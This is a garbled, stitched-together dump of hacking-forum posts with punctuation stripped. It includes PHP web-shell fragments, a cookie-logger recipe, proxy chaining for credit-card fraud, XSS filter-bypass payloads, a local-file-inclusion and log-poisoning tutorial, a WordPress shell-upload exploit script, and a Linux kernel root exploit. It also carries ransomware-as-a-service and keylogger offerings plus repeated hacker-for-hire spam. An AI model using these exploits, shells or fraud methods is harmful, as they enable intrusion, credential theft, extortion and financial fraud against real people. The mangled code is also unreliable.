end exit get 'do' info ini get 'register globals' registerg enable else registerg disable extension loaded 'curl' curls enable else curls disable function exists 'mysql connect' mysql function exists 'mssql connect' mssql function exists 'pg connect' postgresql function exists 'ocilogon' oracle echo head. 
ini get 'openbase dir'. 
sizee disk free space. 
sizee disk total space. 
end exit get 'do' cmd echo head. 
strlen get 'command' get 'execmethod' popen echo get 'execmethod' get 'command' strlen post 'command' post 'execmethod' popen echo post 'execmethod' post 'command' strlen get 'command' get 'execmethod' popen popen get 'command' echo' system exec passthrupopen. 
end exit get 'do' symlink echo head. 
end exit post 'ad syp' post 'ad syp' symlink post 'ad syp' post 'ad syp' alert symlink worked else alert symlink not worked post 'ad syc' post 'ad syc' system 'ls. 
post 'ad syc' alert symlink worked else alert symlink not worked get 'do' slocal echo head. 
you click this link this server crashed. 
dos this server sure this worked php. 
dos this server sure. 
end exit get function dosserver junk str repeat for buff bcpow junk buff null dosserver get function get 'do' convert hash null get 'stringtoh' get 'hashtoh' 'md hash get 'stringtoh' elseif get 'stringtoh' get 'hashtoh' 'sh hash sha get 'stringtoh' elseif get 'stringtoh' get 'hashtoh' 'crc hash crc get 'stringtoh' elseif get 'stringtoh' get 'hashtoh' hash base encode get 'stringtoh' elseif get 'stringtoh' get 'hashtoh' hash base decode get 'stringtoh' echo head. 
convert crc sha base encode base decode. 
end exit get 'do' dump echo head. 
echo 'backup databasedb type. 
gzipsql server username password data base name. 
end exit post 'username' post 'dbname' post 'method' date date dbserver post 'server' dbuser post 'username' dbpass post 'password' dbname post 'dbname' file dump dbname date method post 'method' method 'sql' file dump dbname date. 
sql fopen file else file dump dbname date. 
gzopen file function write data global post 'method' 'sql' fwrite data else gzwrite data mysql connect dbserver dbuser dbpass mysql select dbname tables mysql query show tables while mysql fetch array tables 'tables. 
dbname create mysql fetch array mysql query show create table. 
write create 'create table'. 
sql mysql query select from. 
mysql num rows sql while row mysql fetch row sql foreach row row. 
write insert into values. 
method 'sql' fclose else gzclose header content disposition attachment filename. 
file header content type application download header content length. 
filesize file flush fopen file while feof echo fread flush fclose get 'do' mail echo head. 
address subject textnumber for send. 
end exit post 'admail' post 'submail' for. 
chmodnum get 'do' chmod echo head. 
end exit get 'do' edit get 'filename' dir readable get 'address' chdir get 'address' else alert permission denied explode slash getcwd count addr backk str replace for countback countback. 
addr backk countback slash countback null backdirwin null for countback countback. 
addr backk countback backdirwin addr backk. 
backdirwin backdirwin else countback null backdirwin null for countback countback. 
backdirwin backdirwin str replace function calc dir size path size handle opendir path while false entry readdir handle current path path. 
link current path file current path size filesize current path elseif dir current path size calc dir size current path closedir handle return size function openf parsef global basep slash strlen strpos getcwd basep str replace basep getcwd str replace diropen. 
return diropen get 'address' ifget get 'address' post 'address' ifget post 'address' cwd cwd getcwd nowaddress. 
getcwd hand opendir coi coi while false readdir hand. 
filetype dir coi colort else colort coi fil fil. 
classname 'focus onmouseout this. 
substr sprintf fileperms cwd. 
del' else coi colort else colort coi file file. 
thanks for checker brother. 
step open notepad and copy code. 
php cookie escape document. 
gif step make logger code color. 
txt isset get cookie handle fopen filename 'a' echo temporary server error sorry for the inconvenience. 
exit else fwrite handle. 
get cookie false echo temporary server error sorry for the inconvenience. 
exit echo temporary server error sorry for the inconvenience. 
fclose handle exit echo temporary server error sorry for the inconvenience. 
exit color color save cookielogger. 
php color step color now open new notepad and save blank notepad file logfile. 
txt color step upload your hosting cookielogger. 
gif color snd ths victim color. 
gif url the url the picture tht you want seen victim color. 
dont think dis good. 
introduction there are many reasons why you would need add extra hop after the exit node. 
you trying card some items any site with fraud filters you obviously going raise some flags the cardholder lives new york and you connecting from german exit node. 
same goes for paypal logins. 
keep mind you will need use clean socks within the same region the cardholder account. 
within the same state otherwise within the same area. 
link sites providing private socks services provided the end this article. 
even carding isn your thing many sites filter out exit nodes necessity have some control over where you appear connecting from. 
note you have the tor browser bundle and haven installed tor separately use port place for the following configurations. 
proxychains first download install proxychains sudo apt get install proxychains then configure proxychains setup your chain sudo nano etc proxychains. 
conf down towards the bottom you should see proxylist add proxy here meanwile defaults set tor just write your list using tor the first listed socks. 
here port after that you should done. 
just terminal and set your browser through proxychains proxychains firefox proxifier you are windows you will want setup your chain using proxifier. 
first download and install cracked copy proxifier. 
once you have installed and run options proxy settings and configure your chain. 
address port socks once you have set your proxy settings options proxification rules and set the following rules loopback all. 
exe all all once you are finished name resolution choose remote click and you set. 
keep mind that you use proxifier you need use browser that isn already configured connect through tor will ignore the proxifier settings and just route strictly through tor. 
for this guide recommendation copy firefox portable that has been secured. 
profile proxy servers add. 
popup box will ask whether set default. 
now add your proxy you want use the same way. 
click proxychains button then create and drag drop the new rule. 
you should have something that looks like this. 
address port the details you entered earlier now profile proxification rules. 
the drop down menu for default select proxy socks. 
uncheck the localhost rule. 
then add change action chain new. 
next profile name resolution. 
select resolve hostname through proxy. 
socks providers hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links blacklists hidden content you must reply see links hidden content you must reply see links thats. 
codeffired wrote how setup your own proxy server for free simple goolove learn some newgle search like proxy servers and you find dozens the internet that will help you create proxy servers minutes for free. 
the only limitation with php based proxies that you require web server host the proxy scripts and second you also need domain name act address for your proxy site. 
you don own domain server space you can still create personal proxy server for free and that too without requiring any technical knowledge. 
create free proxy server with google app engine here one such that you can build flomor your friends china even for your personal use say for from office. 
this created using google app engine and contrary what you may think the setup quite simple. 
step and sign using your google account. 
step click the create application button. 
since this your first time google will send verification code via sms your mobile phone number. 
type the code and you all set create apps with google app engine. 
step choose sub domain that will host your proxy server. 
make sure the domain available agree the google terms and click save. 
the sub domain also your app that will uniquely identify your proxy application. 
for this example use labnol proxy server the app though you are free choose any other unique name. 
step now that have reserved the time create and upload the proxy server application google app engine. 
msi installer and install python. 
step once python installed download the google app engine sdk for python and install. 
step download this and extract some folder your desktop. 
the zip file for the curious contains couple text files written html and python that you can read with notepad. 
step start the google app engine launcher program from the desktop and set the right values under edit preferences see screenshot above. 
click file add existing application under the google app launcher program and browse the directory that you created step. 
click the edit button and replace your app with the sub domain that you reserved step. 
step click deploy and your online proxy server now ready for use. 
visual tour setting free proxy with google you can edit the main. 
html file change the appearance your proxy server and you can even add analytics and adsense code your proxy server case gets popular the web. 
the application currently open all users but you can add layer authentication that only users who are logged into their google accounts can use your web proxy server. 
you have made any changes your html files you can upload the latest version google app engine either clicking the deploy button again use the following command appcfg. 
update credits the proxy server uses code from open source web caching project. 
thanks pratham for your help update answer some your questions this proxy works with flash videos like youtube and abc news though not with hulu. 
you are getting the quota exceed error try this mirrorsite. 
update this has been removed since the app engine tos does not allow you split your app across multiple accounts make use the free quotas. 
technically the mirror the proxy violation the tos. 
some you have suggestions domain with the word proxy proxies are banned workplaces you may include them your proxy address. 
though there exist proxy servers for accessing secure sites this basic proxy server that won work with sites that require logins gmail hotmail. 
realy great you sharing this with. 
cross site scripting filtration bypass this tutorial was not originally written introduction xss cross site scripting 'cross site scripting' also known 'xss' short kind vulnerability that exist era both web applications well based applications but most cases web applications. 
you might wondering why it's known 'xss' not 'css' reffering the full form. 
well basically css already reserved abbreviation 'cascade style sheets'. 
allows malicious code executed vulnerable server most probably session hijacking gain administrator privileges. 
xss totally depends cookies and session and though 'cookies' are known the backbone cross site scripting vulnerability. 
brief description the paper the paper based the bypassing filtration common web application security hole known xss cross site scripting. 
xss being common hole winning attention webmasters and their concerns about the afteraffects and the danger that can exploited through possible xss hole and because this most webmasters are patching acutally can said they are filtering and sanitizing common known xss injection strings deny malicious input request overcome xss holes. 
these people think that it's just enough filter some common known strings and boom that's but it's not likely say that you have 'filtered' the holes with just some common known characters. 
common xss strings inject basically javascript and html and some cases vbscript injected through xss vulnerability particular server. 
php can't injected since it's server side and executed the very moment. 
thus will first analyse some common xss strings inject. 
pwned this basic html injection and you are able execute vulnerable server you will see the message 'pwned' somewhere the vulnerable site. 
alert 'xss' this basic javascript injection which will display pop box with the message 'xss'. 
alert 'xss' this secondary javascript injection the vulnerable server which also mostly patched most servers being common string. 
xss filteration pattern and overcoming webmasters mostly filter common strings javascript prevent hijacking which means gurantee bypass the server since javascript client side and once the page saved and altered the hacker comes the scene will now examine the filtration pattern javascript. 
length for var document. 
value alert cross site scripting attempt return false function malstring string string string. 
replace return string now see that the javascript sanitizing user's input and keeping view the length string which exceed the length input any malicious string will abort the request excluding unsanitized strings remove the string and generate alert message. 
how simple just save the page with xss filtration and alter and remove the javascript save again and inject some censored bump works now you might wondering that alter the page then save and inject it's use since the server side work finished but you are wrong lets take example search form form action search. 
php method get now see the server making 'get' request which means our altered page will work for sure since it's sending get request 'search. 
php' without any filteration and wow what have here nice old vulnerable server hijack session exploit some other way bypassing xss simple filteration without alteration now notice the above script used for filtration evolving only few strings knowing there are bunch ways and strings inject malicious request. 
it's only filtering means leaving hackers with vast amount other strings inject malicious code. 
now the question since and are filtered how will able send javascript html code injection well the answer quite easy javascript can executed using and before the orignal script. 
for instance alert 'xss' this will generate alert box again vulnerable server. 
secondly alert 'xss' this will too generate alert box vulnerable server. 
bypassing advance xss filtration some webmasters filter lot more than this especially it's filtered important sites like gov and org sites. 
but all depends their pattern they are doing this javascript will course just alter the page but what the filtration not javascript instead html php even asp. 
there's nothing impossible will try get much info about the filtration much can. 
supposing server that have filtered all strings just more than common way that reads the malicious string the beginning the end avoid and abort this course can bypassed too example can likely 'xss' the above script will bypass filtration for the server that reads the malicious string the beginning. 
alert 'hello world' this will bypass message filtration. 
now will study some more advance filtration bypass. 
some webmasters just simply define pattern cross site scripting script that possibly common. 
this case will mention here the full array strings inject bypassing the filtration. 
will suppose injecting search form. 
php query alert 'hello world' victim. 
php query alert hello world victim. 
php query abcalert hello world victim. 
php query abc alert hello world victim. 
php query abc abc alert hello world victim. 
php query alert victim. 
php query abcalert victim. 
php query pwned' alert victim. 
php query pwned alert victim. 
php query pwned alert pwned victim. 
href 'jalert pwned victim. 
this includes quite advance range bypassing the filtration pattern from alpha numeric and alpha numeric overcoming the word 'alert' filtered with 'document. 
href' functionality and course you can lot addition long you know what exactly are you doing overcoming simple and both advance filtration pattern giving chance succeed all aspects conclusion the paper based bypassing both simple and advance filtration patterns and gaining infinity advantages wrote this article cross site scripting being interest and this paper for educational purpose only don't hold any responsibility for any misuse real time exploitation from this paper. 
cryptolocker especially insidious form ransomeware malware that was first detected the wild september restricts access infected computers and requires victims pay ransom order regain full access. 
what makes cryptolocker bad the way encrypts the user data your hard drive using strong encryption method. 
this makes literally impossible access your own data without paying the ransom amount the criminals between and two bitcoins even now more. 
once affected you will locked out your computer and unless you pay the ransom amount hours the virus will delete the decryption key decrypt all the files your. 
the malware lands pcs the same way other malware does and few sensible precautions will help minimize the chances crytolocker attack. 
yesterday reported that uk's national crime agency has given out urgent national alert that mass spamming event targeting million based email users with cryptolocker. 
what your computer gets compromised currently there option decrypt the files without the decryption key and brute forcing file encrypted with bit encryption almost impossible. 
you don pay the ransom you forever lose access everything you been working which stored your computer. 
few things you can prevent your from getting infected with the cryptolocker virus most viruses are introduced opening infected attachments clicking links malware usually contained spam emails. 
avoid opening emails and attachments from unknown sources especially zip rar archive files. 
most people have some anti virus program but how you know effective ensure you have best one active and date. 
also keep your operating system and software date. 
you have real time backup software then make sure that you first clean the computer and then restore the unencrypted version the files. 
create files the cloud and upload photos online accounts like flickr picasa. 
windows users should set the system restore points you are using windows configure keep the file history. 
make sure you have reformatted your hard drive completely remove the cryptolocker trojan before you attempt install windows and restore your files from backup. 
there are many free tools now available the community that can help users protect their systems from this malware. 
hidden content you must reply see links tool created american security expert nick shaw. 
hidden content you must reply see links this tool applies number settings your installation windows that prevents cryptolocker from ever executing and has been proven work windows and windows environments. 
free utility that will help you protect your computer against the cryptolocker ransomware malware. 
hidden content you must reply see links hidden content you must reply see links contains new feature called cryptoguard that monitors your file system for suspicious operations. 
when suspicious behavior detected the malicious code neutralized and your files remain safe from harm. 
bitdefender anti cryptoblocker hidden content you must reply see links that can detect and block malware from installation. 
intrusion prevention systems can block the communications protocol send from the cryptolocker infected system the remote command and control server where the malware retrieves the key encrypt the files. 
blocking the communications can prevent the encryption from taking place. 
friend discovered xss vulnerability mybb. 
the vulnerability affects version. 
newest release the date writing this thread. 
and possibly all previous versions too. 
the following link you will find example the exploit and also way patch. 
contacted mybb and the official fix will released the next version. 
html have nice day. 
love burp suite professional. 
cheers for the share. 
suppose ill take look this. 
search hacker cyberghost senior member icefog who professional the following services hack and access data from any company websites fund transfer from any bank website hack and upgrade university grades sales hacking softwares online tutorials hack into your partner facebook account without their knowledge notification hack into any government agency website hijack username password access any site hack into security agency website and erase criminal records hack and obtain cash advances hack and obtain social security number hack into any data base hack paypal account mastercard american express etc. 
server crashed hack are experts data and files recovery hack bank atm card pin and password development university grades changing website crashed hack server crashed hack erase criminal records hack databases hack sales dumps cards all kinds untraceable individual computers hack websites hack control devices remotely hack burner numbers hack skype hack credit cards hacker hack into any bank website hack into any company website hack into any government agency website hack into security agency website and erase criminal records hack into any data base hack paypal account hack wordpress blogs server crashed hack untraceable etc can restore lost files and documents matter how long they have been missing contact cyberghost. 
com note offer expert trainings hacking and pin generation with our book and online tutorials your partner cheating you can teach you how hack into their phone monitor their text and conversation. 
hack and use credit card shop online monitor any phone and email address university database hacking for grade change and enrollment also available grades changes generally enrollment contact cyberghost. 
leet psybnc irc bawt rat irc. 
exe mirc youriphere bhelp addserver irc. 
net irc psybnc irc freepsybnc. 
bounceadmin bhelp bwho bhelp admin bhelp bhelp setusername bhelp setaway bhelp setleavemsg bhelp leavequit bhelp setawaynick bhelp jump irc bhelp server bhelp bquitted bhelp aidle antiidle bhelp autorejoin bhelp addserver irc serverlist bhelp delserver irc bhelp irc bhelp bhelp deltranslate bhelp listtranslate bhelp addlog bhelp dellog bhelp listlogs bhelp playtrafficlog bhelp bhelp madmin bhelp unadmin bhelp bkill bhelp sockstat bhelp adduser bhelp deluser bhelp namebouncer bhelp linkto bhelp linkfrom bhelp dellink bhelp listlinks bhelp relink bhelp playmainlog bhelp erasemainlog bhelp bhelp bhelp bhelp bhelp windir system psybnc. 
socks defaultset proxys leech set def. 
ircserver proxys set def. 
ircserver proxys set fldchan channel proxys set pxyfile proxy. 
txt socks file sock. 
txt socks abord abord filterfile validproxy. 
txt channel channel channel vnc rangevnc. 
tellvnc vnc listvnc vnc addresse rdp set rdp write rangerdp. 
stoprdp rdp tellpass rdp listpasswords rdp. 
exe name emisoft agnitum arcavir avast win bitdefender bullguard bytehero clamav eset nod secure fsb fortinet fprot gdata iobit ikarus immunet ultimate microsoft security essentials netgate totaldefense trustport unthreat vba trojan. 
dqac vexira vipre virit webroot zillya zoner escanav escan etrust vet nprotect. 
okay will give thought. 
search hacker kevin poulsen senior member icefog who professional the following services hack and access data from any company websites fund transfer from any bank website hack and upgrade university grades sales hacking softwares online tutorials hack into your partner facebook account without their knowledge notification hack into any government agency website hijack username password access any site hack into security agency website and erase criminal records hack and obtain cash advances hack and obtain social security number hack into any data base hack paypal account mastercard american express etc. 
server crashed hack are experts data and files recovery hack bank atm card pin and password development university grades changing website crashed hack server crashed hack erase criminal records hack databases hack sales dumps cards all kinds untraceable individual computers hack websites hack control devices remotely hack burner numbers hack skype hack credit cards hacker hack into any bank website hack into any company website hack into any government agency website hack into security agency website and erase criminal records hack into any data base hack paypal account hack wordpress blogs server crashed hack untraceable etc can restore lost files and documents matter how long they have been missing contact gmail. 
hack and use credit card shop online monitor any phone and email address university database hacking for grade change and enrollment also available grades changes generally enrollment contact gmail. 
waiting try this really hope works. 
you need assistance any these social media hack facebook whatsapp twitter instagram youtube hack bank accounts hack email accounts hack spy your spouse lover grade changes increase your credit score background checks employee competitor monitoring restore crashed websites server crashed hack retrieval lost file documents expurnge criminal records database hack sales dumps cards all kinds blank atm cards with good balance untraceable individual computers hack websites hack control devices remotely burner numbers hack verified paypal accounts hack virtual paypal accounts for online payments android iphone hack hack word press blogs text message interception email interception and more contact via cyberghost. 
com get scheduled and completed hrs. 
prince chaddha wrote facebook account reset hijack session day exploit only for url attach config attach lets works. 
let's see what this. 
vpfc using facebook accounts. 
hope works thanks lot. 
tat sounds like plan. 
thank for the share brother. 
lets see how working. 
this topic for all website vuln good luck. 
originally written fredrik nordberg almroth local file inclusion the title says this short and descriptive guide about various methods exploit using local file inclusion lfi. 
will cover the following topics poison null bytes log poisoning proc self alternative log poisoning malicious image upload injection code the use mails creativity fredrik nordberg almroth the question. 
what lfi lfi the title says method for servers scripts include local files run time order make complex systems procedure calls. 
well most the time you find the lfi url's the web pages. 
mainly because developers tend like the use get requests when including pages. 
now let's proceed shall how you find fingerprint them let's say you find the following url code color. 
php for real color code color notice that this url goes the. 
php which sub domain site. 
has several parameters for the internal. 
php parse the not and the for variable. 
let's study them bit more. 
the not variable contains the value exist. 
php and the for variable contains real. 
now turned pretty obvious didn't the not variable seem take another php file argument most possibly for inclusion hurray let's try play around with now what let's try tamper with the url see what can with. 
let's change the content the not variable etc passwd and see what happens. 
course you can change the etc passwd any other file your choice but we'll just stick with through out this tutorial. 
php not etc passwd for real let's check the result you get result looking something like this code root root root bin bash bin bin bin sbin nologin daemon daemon sbin sbin nologin adm adm var adm sbin nologin var spool lpd sbin nologin sync sync sbin bin sync shutdown shutdown sbin sbin shutdown halt halt sbin sbin halt mail mail var spool mail sbin nologin news news etc news uucp uucp var spool uucp sbin nologin operator operator root sbin nologin games games usr games sbin nologin test test var test sbin nologin ftp ftp user var ftp sbin nologin nobody nobody sbin nologin then sir. 
you've found lfi vulnerability the etc passwd file world readable nix systems. 
that means you can chance read. 
unless someone have changed permissions changed the open basedir configuration. 
but more that some other time now let's try another scenario. 
say the programmer the website coded like this code. 
php how would then can't read etc passwd because the script appends. 
php the end the file. 
gladly for you there's another trick here. 
the null byte special byte used everywhere the background your computer your targets. 
it's the binary representation. 
zero's binary the hexadecimal representation. 
one the usages this special byte terminate strings. 
you've been programming for while you must know what string. 
amount text okay sounds complex now. 
but this method really really simple. 
php concatenation simply append after our filename. 
php for etc passwd and hopefully your result once again root root root bin bash awesome can now read any file the server with the privileges the account the server we've now obtained now you might ask how can execute code through this the answer. 
log poisoning say we're exploiting plain normal apache server. 
default create two log files called access log and error log the server. 
tamper those logs can successfully upload our own php code the server which might give you remote command execution you wish the choice yours. 
the question where are those logs stored gladly for you i've compiled small list. 
here you color code color etc. 
log etc opt lampp logs access log opt lampp logs error log usr local apache log usr local apache logs usr local apache logs access. 
log usr local apache logs access log usr local apache logs error. 
log usr local apache logs error log usr local etc usr local etc usr local logs var apache logs access log var apache logs error log var log apache access. 
log var log apache error. 
log var log apache ssl access. 
log var log apache ssl error. 
log var log var log var log. 
access log var log var log var log access log var log error log var logs access. 
log var logs access log var logs error. 
log var logs error log apache logs access. 
log apache logs error. 
log program files apache group apache logs access. 
log program files apache group apache logs error. 
log program files wamp apache logs wamp apache logs wamp logs xampp apache logs access. 
log xampp apache logs error. 
log color now there's two good methods for proceeding depending which log you choose. 
the best one opinion accessing the error log. 
this method little outside the box. 
say you find lfi this server simple going this url php code will saved the error log code. 
com now try reach going here code. 
php for var log apache logs error log uname your result says something like linux then your code execution was successful. 
yeah yeah you get the point. 
gets stored the error log because the code file not exist. 
method accessing the access log. 
it's little bit more complicated the best way this put php code your user agent. 
there's great plug for firefox called user agent switcher this the fly. 
other than that it's the same thing. 
com any other file accessible the server with your user agent spoofed your php snippet. 
then the access log order execute the code code. 
php for var log apache logs access log yeah sure you're cool you can execute your own code now let's hardcore. 
proc self the linux kernel fascinating. 
i'm not sure you've heard this but the proc self symbolic link symlink going the instance the target http server. 
there several things you can using this link one the access log method simply spoofing your user agent php code then try include the proc self environ. 
everyone knows that these days. 
however your code will executed let's move more. 
you can obtain the http configuration file simply trying include proc self cmdline because most the time the config file set command line argument simple but cool feature nothing malicious here that's just the way works. 
what you choose with the config file you. 
the log file location tend there. 
you got the grip now i'll just keep writing. 
there yet another way resolve the log files using this link simply going the file description the log file the running stream. 
handy yes need for you run dictionary attack order resolve the different log files include the proc self cmdline. 
now how access those file descriptions well sir the proc self tend have folder called. 
stand for file description. 
the content within numeric id's going different open files. 
the easiest way for find simply iterate our way through. 
php for proc self. 
for proc self sooner later you'll find one the log files. 
doing that you just with the access log the error log method. 
have you ever had any success with the ordinary log poisoning methods mean like the cases your requests gets uri encoded and that ruining your code. 
here comes alternative method alternative log poisoning apache got the tendency log the authorized user any specified. 
the authorization header part the http protocol i've bet you've seen. 
creates prompt asking for username and password htaccess when you try reach protected folder. 
internet explorer makes prompt looking like this yeah well. 
the username and password gets sent base encoded with separator. 
and you might have figured out the base wont get uriencoded providing this header your http request authorization basic qsfagjhm hrvq vjag lzdgvtkcrzwyd ppz the code will stay untouched and simply unpacked apache straight the logs. 
the base the small php payload i've used earlier just with the end follow the http rfc's. 
now when we're exploiting using different methods and stuff. 
why not exploit lfi with jpg malicious image upload yes you heard. 
you can use picture order execute code the use lfi vulnerability. 
however you need special software this for you. 
the attack consists changing the exif data the image your choose. 
say you're exploiting community which allows image uploads for let's say your avatar. 
tampering with the exif data and finding lfi you can take full control cool huh the exif data tend hold what camera model year place location etc. 
when the image was taken but proven before it's rather easy tamper with. 
injection code the use mails say your target server got port open pop pop for handling mails. 
you could send mail the http server user target box. 
com and then try include the var spool mail apache this exists. 
it's possible execute through this well. 
however it's not very common find this specific exploit. 
course the mail you send will contain the php code for you execute. 
there literary hundreds ways perform this attack depending the mail server running back end. 
qmail for example stores the incoming mails var log maillog default but been said before this thinking outside the box. 
creativity why stop here i'm sure the linux kernel irix aim windows sunos bsd and other os'es provides yet more interesting exploit scenarios. 
they have ssh open try inject php code the ssh username and grab the ssh log. 
will work maybe can the embedding malicious content like the jpg exif field done withing file try yourself. 
color origin account bypass security question when you get cracked origin accounts this method shows you how bypass security question. 
hidden content you must reply see links color. 
screenshoot download nice script. 
let's see how works out. 
good job and thanks. 
color now gona show you how stop time internet caffee all need one cmd command prompt this blocked then there are ways open that. 
click the right mouse desktop new shortcut write command. 
com without quotes next finish. 
create new text document than press cmd without quotes that and save bat file. 
bat and then you can open the desktop. 
this should give you access cmd now open comand promt cmd and press regedit without quotes. 
now has open registry. 
act below hkey current user appevents software classes microsoft windows current version internet settings policies system now written the right side disable task manager click and send down modify and change value and then open task manager. 
ctrl alt del delete and close the time meter the internet caffe. 
for reading guys color. 
chiku rhayt wrote download version. 
zip nice one man almost got facebook accounts. 
good bro thank for sharing. 
com watch vnpeevc video php code usr bin python exploit name wordpress wpdatatables. 
and below shell upload vulnerability vulnerability discovered claudio viviani date exploit written claudio viviani video demo. 
com watch vnpeevc issue. 
php this function always available without wpdatatables edit permission function wdt upload file require once pdt root path. 
php' uploadhandler new uploadhandler exit. 
add action 'wp ajax wdt upload file' 'wdt upload file' add action 'wp ajax nopriv wdt upload file' 'wdt upload file' issue. 
php this php script allows you upload any type file dork google inurl plugins wpdatatables inurl codecanyon index wpdatatables index codecanyon tested backbox. 
http urllib urllib sys args optparse file. 
path check urldef checkurl url url and url print you must insert procotol' sys. 
exit else return url check file exists and has readabledef checkfile file not. 
isfile file and not. 
print file file missing not readable' sys. 
exit else return file create multipart headerdef create body upl payloadname getfields dict payloadcontent open payloadname. 
read limit limit the file crlf for key value getfields. 
append 'content disposition form data name key. 
append 'content disposition form data name filename 'files payloadname. 
append 'content type application force download'. 
join return body banner. 
com channel ucqqmsdmqf exicce djlbww commandlist optparse. 
optionparser 'usage prog url filename. 
php timeout sec commandlist. 
add option target' action store help insert target url. 
add option file' action store help insert file name shell. 
add option timeout' action store default type int help timeout value default options remainder commandlist. 
parse args check argsif not options. 
file print banner commandlist. 
exit payloadname checkfile options. 
file host checkurl options. 
timeout print banner url wpdatatab upload host admin admin ajax. 
php action wdt upload file' content type 'multipart form data boundary limit the file bodyupload create body upl payloadname headers 'user agent' 'mozilla. 
khtml like gecko chrome. 
'content type' content type 'content length' str len bodyupload try req urllib. 
request url wpdatatab upload bodyupload headers response urllib. 
urlopen req read response. 
read error read read print upload failed else backdoor location. 
group print shell uploaded print location backdoor location. 
print http error str except urllib. 
urlerror print connection error str. 
wow thans work wrote free working php script check valid emails and registred with paypal. 
someone has some lol accounts from botnets something least would very grateful. 
good try reccomend all. 
bye thanks for this. 
chakran and tanks tanks latt. 
thnkas lot nice leak will try. 
thx for tools visit. 
still working many dead links around. 
biggie biggie biggie can't see pac alive and chillin right now. 
this was very helpful and very useful. 
mediafire has removed this noe. 
example new crypto released fakben team. 
are part team consisting highly efficient developers and hackers. 
have records from our client well highest repeat hire rate. 
believe mutual growing with client and hence work technology partner and consultant for our clients. 
search hacker hack and access data from any company websites fund transfer from any bank website hack and upgrade university grades sales hacking softwares online tutorials hack into your partner facebook account without their knowledge notification hack into any government agency website hijack username password access any site hack into security agency website and erase criminal records hack and obtain cash advances hack and obtain social security number hack into any data base hack paypal account mastercard american express etc. 
the cryptolocker was updated have changed server and now price stable for version cryptolocker are currently working the version and good news soon. 
nickron wrote hidden content you must reply see linksjust sign here and confirm your account receive usd lets try hope its not scam. 
execution rate try yourself about fakben team offers unique and professional service that based the rental our cryptolocker ransomware which can downloaded through the executable file that built with your custom settings and then sent specific victim ask for ransom money. 
the uniqueness our service relys upon the building ransomware that has all the specifics you decide such the total amount that victim has pay and the btc wallet destination. 
how works and price for service you can download cryptolocker executable file for. 
when you have done the payment you will immediately enabled the building source the ransomware you can specify the amount money you want receive and the address destination for btc. 
when crytpolocker file executed the victim's machine crypts all files. 
the only things that victims can are pay the amount money you specified keep all files encrypted permanently then automatic window opened and asked the victim pay order get the key for the decryption the files. 
when the person pays for files decryption automatic. 
when money payed will take for the service and then the other amount will sent the address you specified before. 
recommend you use this website order hide files from. 
the service accepts btc wbz cryptocurrency and hides completely few minutes. 
furthermore advise this scann service. 
com check your file has been completely hidden. 
the crypting key are not stored inside the cryptolocker. 
need seconds for key exchanging this site uses jquery you can see the source code order create your cryptolocker you have enable javascript conclusion will keep working the settings the cryptolocker improving methods for undetection. 
will give all the support that costumers need through jabber service. 
not our interest who will infected which kind methods you will important for you use brain and intelligence order spread. 
thanks for your attention. 
there this cool have tio tupe charactewrs. 
thanks for sharing looks awesome. 
thank you man good. 
really want try this. 
thank you for this post. 
thanks for the tut. 
thanks for the share mate. 
indent thanks for sharing indent. 
why one voteing for this comm guys. 
thanks for this topic and this tools. 
microsoft office kms activator ultimate here microsoft office activator office kms activator ultimate the most simple user friendly activator for microsoft office all editions. 
safe activator with harm system files period activation trial generic key permanent mak key. 
you can remove any previous activations. 
you can know information about your activation features mak key updated every day kms server updated every day clean activation history activation backup detects what version you have installed your detects where installed office your view current key how use. 
install office kms activator ultimate. 
click clean activaton history. 
click update mak key. 
click update kms server. 
select any kms server. 
that all seriously hit that button that's motivating factor hidden content you must reply see links note always perform virus scan and download your own risk. 
looks cool dude thanks for the upload. 
luckmangamer wrote hidden content you must reply see links about computer and network security complex subject and ever moving target. 
cardable vps method method use socks vpn live reccomended add money under then select rdp and they give you panel click start button and wait open the rdp site. 
features fully undetected batch code easy setup works with windows vista runs silently the background copies files fast servers trace left process shown makes beep sound once when finished steals text messages iphone backup system info processes running favorites documents pictures videos. 
exe minecraft lastlogin downloads mozilla firefox file dump internet explorer file dump google chrome file dump setup. 
put the files onto usb flash drive the biggest size you have you may run out space. 
vbs script not the. 
wait for copy the files goes the following order info pics texts videos documents various dumps. 
done how decrypt and read the text messages. 
install perl you not have already from here. 
put the files from the text scripts folder into the text message folder created from the stealer. 
hold shift and right click the text messages folder and click open command window here. 
type this and hit enter perl backup. 
directory hidden content you must reply see this content credits chumlee. 
hawkeye keylogger cracked email ftp php stable stealer binder please note did not crack this. 
attention this crack takes long time load. 
for was like minute bit more maybe. 
but this definitly clean working crack made just wait then you will see usual splashscreen and then the interface hawkeye keylogger. 
download note always perform virus scan and download your own risk. 
today i'll provide you local root for linux kernel. 
you can download from. 
koc copy paste the code below. 
code cve exploit linux. 
org june based sd's exploit. 
define gnu source include. 
define base define base jump define size define ksize define tmp xdeadbeef struct idt uint limit uint addr attribute packed static int static int perf open uint off struct perf event attr attr int printf perf open off int off memset attr sizeof attr attr. 
type perf type software attr. 
size sizeof attr attr. 
exclude kernel syscall sys perf event open attr return void start void void next void void void asm start call next iretq next void void int uint current uint uint uint kbase uint current int uid tmp int gid tmp for uint void current uint cred uint kbase continue for cred uid cred gid for cred return static void replace uint uint needle uint val void memmem needle sizeof needle errx can't find needle memcpy val sizeof val static void map mem uint addr void mmap void addr size prot read prot write map anonymous map private map fixed map failed err mmap return static int find mem void mem uint int uint mem for size return return static void dropshell setuid errx failed printf launching shell execl bin null exit void morte int printf got signal close dropshell static void trigger int intr switch intr case int int while break case asm int break case asm int break default errx unknown intr intr sleep int main int argc char argv uint int uint off uint addr base struct idt idt uint kbase int int intr printf searchin. 
map mem base map mem base jump memset size off perf open off close find mem xff find mem errx can't find overwrite addr base jump printf detected config jump label munmap size munmap size addr addr off printf perf swevent enabled addr asm sidt idt printf idt idt. 
addr off addr idt. 
addr off switch off case intr break case intr break case intr break default errx remainder off printf using interrupt intr off intr assert off off off off printf offset off kbase uint idt. 
addr xff printf shellcode kbase mmap kbase ksize prot read prot write prot exec map private map anonymous map fixed map failed err mmap memset kbase ksize kbase ksize next start memcpy kbase start kbase memcpy kbase replace kbase tmp getuid replace kbase tmp getgid signal sigalrm morte alarm printf triggering sploit perf open off trigger intr exit you need any help you can contact lbiggboss hotmail. 
get here hide reply hide reply password hide reply hide reply johan cyril lazaro wrote admin wrote color cpanel nightmare priv times faster from puplic version its shows becoz its code. 
get here hidden content cannot quoted. 
password hidden content cannot quoted. 
where can see the link when reply. 
getting from hacker's forum not risky hope free infection. 
don't mind admin just joking. 
let see can done right. 
